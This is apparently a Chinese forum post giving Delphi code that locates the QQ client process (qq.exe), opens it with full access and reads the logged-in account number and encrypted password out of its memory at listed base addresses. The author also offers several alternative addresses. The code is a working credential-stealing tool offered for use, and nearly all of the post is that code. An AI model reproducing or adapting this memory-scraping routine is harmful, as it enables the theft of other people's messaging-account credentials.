此方法仅限于使用狂人出品的登录器之前搞错了抱歉
另外就是基址我找了好几个地方如都能用
不知道是不是准确的下面是我找的所有基址我本机是能够正常读取的
$00f22a29 $01044039 $01342a29 $03050ba9 $042d2821 $04902a29
下面演示代码用的是$00f22a29
{http://www.lovehuai.cn
darkzol_huai@163.com}
function getpid(_getpid:string):dword; //获取进程pid
var
h:thandle;
f:boolean;
lppe:tprocessentry32;
begin
h := createtoolhelp32snapshot(th32cs_snapprocess, 0);
lppe.dwsize := sizeof(lppe);
f := process32first(h, lppe);
while integer(f) <> 0 do
begin
if lppe.szexefile = _getpid then
begin
result:=(lppe.th32processid);
break;
end;
f := process32next(h, lppe);
end;
end;
procedure tform1.button1click(sender: tobject);
var
hprocess,iread:cardinal;
buffer:pointer;
temppid:dword;
name,pass:string;
n:integer;
begin
memo1.text:='';
getmem(buffer,1024);
try
temppid:=getpid('qq.exe');
hprocess := openprocess(process_all_access,false,temppid);
if readprocessmemory(hprocess,pointer($00f22a2f),buffer,10,iread) then
name:=(pchar(buffer));
n:=(length(widestring(name)))+9;
if readprocessmemory(hprocess,pointer(($00f22a2f)+n),buffer,50,iread) then
pass:=(pchar(buffer));
finally
freemem(buffer,1024);//关闭句柄释放内存
end;
memo1.lines.add('qq账号:'+name+'----qq密码密文:'+pass);
end;
